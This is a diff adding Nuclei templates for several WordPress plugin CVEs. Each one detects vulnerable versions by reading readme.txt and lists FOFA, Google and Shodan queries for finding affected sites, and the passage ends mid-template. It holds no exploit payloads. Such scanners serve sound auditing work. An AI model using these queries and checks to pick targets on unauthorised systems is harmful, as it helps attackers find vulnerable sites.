https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/107a0612-5e58-428b-a097-1c4012e89449?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-48035 + metadata: + fofa-query: "wp-content/plugins/acf-images-search-and-insert/" + google-query: inurl:"/wp-content/plugins/acf-images-search-and-insert/" + shodan-query: 'vuln:CVE-2024-48035' + tags: cve,wordpress,wp-plugin,acf-images-search-and-insert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-images-search-and-insert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-images-search-and-insert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48037.yaml b/poc/cve/CVE-2024-48037.yaml new file mode 100644 index 0000000000..dd9ebdbb75 --- /dev/null +++ b/poc/cve/CVE-2024-48037.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48037 + +info: + name: > + Contact Form Widget <= 1.4.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Contact Form Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.2. This is due to missing or incorrect nonce validation on the 'delete-contact-query' case in the all-query-page.php file. This makes it possible for unauthenticated attackers to delate contact queries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbb5e80a-4dfe-429c-96c1-7fab52e0ce21?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-48037 + metadata: + fofa-query: "wp-content/plugins/new-contact-form-widget/" + google-query: inurl:"/wp-content/plugins/new-contact-form-widget/" + shodan-query: 'vuln:CVE-2024-48037' + tags: cve,wordpress,wp-plugin,new-contact-form-widget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/new-contact-form-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "new-contact-form-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48038.yaml b/poc/cve/CVE-2024-48038.yaml new file mode 100644 index 0000000000..ca7a8396cb --- /dev/null +++ b/poc/cve/CVE-2024-48038.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48038 + +info: + name: > + wp-Monalisa <= 6.4 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The wp-Monalisa plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.4. This is due to missing or incorrect nonce validation on the wpml_admin() function. This makes it possible for unauthenticated attackers to perform bulk actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6d3396d-708d-45de-b32a-66e17624dc62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-48038 + metadata: + fofa-query: "wp-content/plugins/wp-monalisa/" + google-query: inurl:"/wp-content/plugins/wp-monalisa/" + shodan-query: 'vuln:CVE-2024-48038' + tags: cve,wordpress,wp-plugin,wp-monalisa,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-monalisa/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-monalisa" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48039.yaml b/poc/cve/CVE-2024-48039.yaml new file mode 100644 index 0000000000..660dd06280 --- /dev/null +++ b/poc/cve/CVE-2024-48039.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48039 + +info: + name: > + CubeWP – All-in-One Dynamic Content Framework <= 1.1.15 - Missing Authorization + author: topscoder + severity: low + description: > + The CubeWP – All-in-One Dynamic Content Framework plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several funcstions like 'cwp_user_fields_data_callback ' and 'cwpform_save_shortcode' in versions up to, and including, 1.1.15. This makes it possible for authenticated attackers, with subscriber-level access and above, to update various plugin settings and export data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/307e3e47-fac8-400d-9b90-b75b39ee14c3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-48039 + metadata: + fofa-query: "wp-content/plugins/cubewp-framework/" + google-query: inurl:"/wp-content/plugins/cubewp-framework/" + shodan-query: 'vuln:CVE-2024-48039' + tags: cve,wordpress,wp-plugin,cubewp-framework,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cubewp-framework/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cubewp-framework" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.15') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48040.yaml b/poc/cve/CVE-2024-48040.yaml new file mode 100644 index 0000000000..be50a9feaf --- /dev/null +++ b/poc/cve/CVE-2024-48040.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48040 + +info: + name: > + Tainacan <= 0.21.8 - Authenticated (Subscriber+) SQL Injection + author: topscoder + severity: low + description: > + The Tainacan plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 0.21.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7783f6fd-02c9-4ff0-ba36-77a0ad5a4bb6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-48040 + metadata: + fofa-query: "wp-content/plugins/tainacan/" + google-query: inurl:"/wp-content/plugins/tainacan/" + shodan-query: 'vuln:CVE-2024-48040' + tags: cve,wordpress,wp-plugin,tainacan,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tainacan/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tainacan" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.21.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48041.yaml b/poc/cve/CVE-2024-48041.yaml new file mode 100644 index 0000000000..5bbd448a25 --- /dev/null +++ b/poc/cve/CVE-2024-48041.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48041 + +info: + name: > + CM Tooltip Glossary <= 4.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The CM Tooltip Glossary plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.3.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1cc2bc18-8182-4716-bb34-ffb574d8c874?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-48041 + metadata: + fofa-query: "wp-content/plugins/enhanced-tooltipglossary/" + google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary/" + shodan-query: 'vuln:CVE-2024-48041' + tags: cve,wordpress,wp-plugin,enhanced-tooltipglossary,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "enhanced-tooltipglossary" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7417.yaml b/poc/cve/CVE-2024-7417.yaml new file mode 100644 index 0000000000..6878778330 --- /dev/null +++ b/poc/cve/CVE-2024-7417.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7417 + +info: + name: > + Royal Elementor Addons and Templates <= 1.3.986 - Authenticated (Subscriber+) Private Post Disclosure + author: topscoder + severity: low + description: > + The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.986 via the data_fetch. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract data from password protected posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3dfb0b7-5d9f-492b-9a1a-d4445d39c00c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7417 + metadata: + fofa-query: "wp-content/plugins/royal-elementor-addons/" + google-query: inurl:"/wp-content/plugins/royal-elementor-addons/" + shodan-query: 'vuln:CVE-2024-7417' + tags: cve,wordpress,wp-plugin,royal-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/royal-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "royal-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.986') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8032.yaml b/poc/cve/CVE-2024-8032.yaml new file mode 100644 index 0000000000..26c66549ec --- /dev/null +++ b/poc/cve/CVE-2024-8032.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8032 + +info: + name: > + Smooth Gallery Replacement <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Smooth Gallery Replacement plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba8c88e9-e84c-4fe7-a3b1-ee77c49d5590?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8032 + metadata: + fofa-query: "wp-content/plugins/smooth-gallery-replacement/" + google-query: inurl:"/wp-content/plugins/smooth-gallery-replacement/" + shodan-query: 'vuln:CVE-2024-8032' + tags: cve,wordpress,wp-plugin,smooth-gallery-replacement,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smooth-gallery-replacement/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smooth-gallery-replacement" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1.yaml b/poc/cve/CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1.yaml new file mode 100644 index 0000000000..1c98681741 --- /dev/null +++ b/poc/cve/CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1 + +info: + name: > + KB Support – WordPress Help Desk and Knowledge Base <= 1.6.6 - Missing Authorization to Authenticated (Subscriber+) Multiple Administrator Actions + author: topscoder + severity: low + description: > + The KB Support – WordPress Help Desk and Knowledge Base plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on several functions in the /includes/ajax-functions.php file all versions up to, and including, 1.6.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform multiple administrative actions, such as replying to arbitrary tickets, updating the status of any post, deleting any post, adding notes to tickets, flagging or unflagging tickets, and adding or removing ticket participants. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5fb90b3b-08bd-4887-a6bf-054b42d3e403?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N + cvss-score: 8.1 + cve-id: CVE-2024-8548 + metadata: + fofa-query: "wp-content/plugins/kb-support/" + google-query: inurl:"/wp-content/plugins/kb-support/" + shodan-query: 'vuln:CVE-2024-8548' + tags: cve,wordpress,wp-plugin,kb-support,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kb-support/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kb-support" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134.yaml b/poc/cve/CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134.yaml new file mode 100644 index 0000000000..e11b58bc6c --- /dev/null +++ b/poc/cve/CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134 + +info: + name: > + KB Support – WordPress Help Desk and Knowledge Base <= 1.6.6 - Missing Authorization to Unauthenticated Ticket Reply Exposure + author: topscoder + severity: high + description: > + The KB Support – WordPress Help Desk and Knowledge Base plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the 'kbs_ajax_load_front_end_replies' and 'kbs_ajax_mark_reply_as_read' functions in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to read replies of any ticket, and mark any reply as read. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/767b1234-5b4a-4baa-9048-7b2e413cdba5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-8632 + metadata: + fofa-query: "wp-content/plugins/kb-support/" + google-query: inurl:"/wp-content/plugins/kb-support/" + shodan-query: 'vuln:CVE-2024-8632' + tags: cve,wordpress,wp-plugin,kb-support,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kb-support/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kb-support" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8700.yaml b/poc/cve/CVE-2024-8700.yaml new file mode 100644 index 0000000000..bdcbc17d35 --- /dev/null +++ b/poc/cve/CVE-2024-8700.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8700 + +info: + name: > + Event Calendar <= 1.0.4 - Missing Authorization to Unauthenticated Arbitrary Calendar Deletion + author: topscoder + severity: high + description: > + The Event Calendar plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to delete arbitrary calendars created by the plugin. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9694f4e0-be99-4122-82d2-b22e7422c877?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8700 + metadata: + fofa-query: "wp-content/plugins/event-calendars/" + google-query: inurl:"/wp-content/plugins/event-calendars/" + shodan-query: 'vuln:CVE-2024-8700' + tags: cve,wordpress,wp-plugin,event-calendars,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/event-calendars/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "event-calendars" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8719.yaml b/poc/cve/CVE-2024-8719.yaml new file mode 100644 index 0000000000..80cd9b5614 --- /dev/null +++ b/poc/cve/CVE-2024-8719.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8719 + +info: + name: > + Flexmls® IDX Plugin <= 3.14.22 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Flexmls® IDX Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters like 'MaxBeds' and 'MinBeds' in all versions up to, and including, 3.14.22 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aac3fb8e-9b92-4ed1-ac9f-50870d4c5c9f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8719 + metadata: + fofa-query: "wp-content/plugins/flexmls-idx/" + google-query: inurl:"/wp-content/plugins/flexmls-idx/" + shodan-query: 'vuln:CVE-2024-8719' + tags: cve,wordpress,wp-plugin,flexmls-idx,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flexmls-idx/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flexmls-idx" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.14.22') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml b/poc/cve/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml new file mode 100644 index 0000000000..5cf235f977 --- /dev/null +++ b/poc/cve/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6 + +info: + name: > + GetResponse Forms by Optin Cat <= 2.5.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The GetResponse Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51d14f45-4c30-4225-998d-f4f829e09bc0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8740 + metadata: + fofa-query: "wp-content/plugins/getresponse/" + google-query: inurl:"/wp-content/plugins/getresponse/" + shodan-query: 'vuln:CVE-2024-8740' + tags: cve,wordpress,wp-plugin,getresponse,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/getresponse/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "getresponse" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de.yaml b/poc/cve/CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de.yaml new file mode 100644 index 0000000000..7e1b9e642b --- /dev/null +++ b/poc/cve/CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de + +info: + name: > + Social Share With Floating Bar <= 1.0.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Social Share With Floating Bar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ec35484-8561-4a8c-bf67-0a880f915fb1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8790 + metadata: + fofa-query: "wp-content/plugins/social-share-with-floating-bar/" + google-query: inurl:"/wp-content/plugins/social-share-with-floating-bar/" + shodan-query: 'vuln:CVE-2024-8790' + tags: cve,wordpress,wp-plugin,social-share-with-floating-bar,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/social-share-with-floating-bar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "social-share-with-floating-bar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2.yaml b/poc/cve/CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2.yaml new file mode 100644 index 0000000000..2b7c04d01d --- /dev/null +++ b/poc/cve/CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2 + +info: + name: > + Suki Sites Import <= 1.2.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Suki Sites Import plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c6dd146-a99e-4317-a703-de34735317c8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8916 + metadata: + fofa-query: "wp-content/plugins/suki-sites-import/" + google-query: inurl:"/wp-content/plugins/suki-sites-import/" + shodan-query: 'vuln:CVE-2024-8916' + tags: cve,wordpress,wp-plugin,suki-sites-import,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/suki-sites-import/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "suki-sites-import" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8920.yaml b/poc/cve/CVE-2024-8920.yaml new file mode 100644 index 0000000000..a952ea58b0 --- /dev/null +++ b/poc/cve/CVE-2024-8920.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8920 + +info: + name: > + Fonto – Custom Web Fonts Manager <= 1.2.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Fonto – Custom Web Fonts Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/358be91d-cb00-429b-a4ed-69bf81e4d19e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8920 + metadata: + fofa-query: "wp-content/plugins/fonto/" + google-query: inurl:"/wp-content/plugins/fonto/" + shodan-query: 'vuln:CVE-2024-8920' + tags: cve,wordpress,wp-plugin,fonto,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fonto/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fonto" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9184.yaml b/poc/cve/CVE-2024-9184.yaml new file mode 100644 index 0000000000..c4e23a6efd --- /dev/null +++ b/poc/cve/CVE-2024-9184.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9184 + +info: + name: > + SendPulse Free Web Push <= 1.3.6 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The SendPulse Free Web Push plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.6 due to incorrect use of the wp_kses_allowed_html function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/74831bf8-0a30-4758-bfe6-5a5b4ee7ec24?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-9184 + metadata: + fofa-query: "wp-content/plugins/sendpulse-web-push/" + google-query: inurl:"/wp-content/plugins/sendpulse-web-push/" + shodan-query: 'vuln:CVE-2024-9184' + tags: 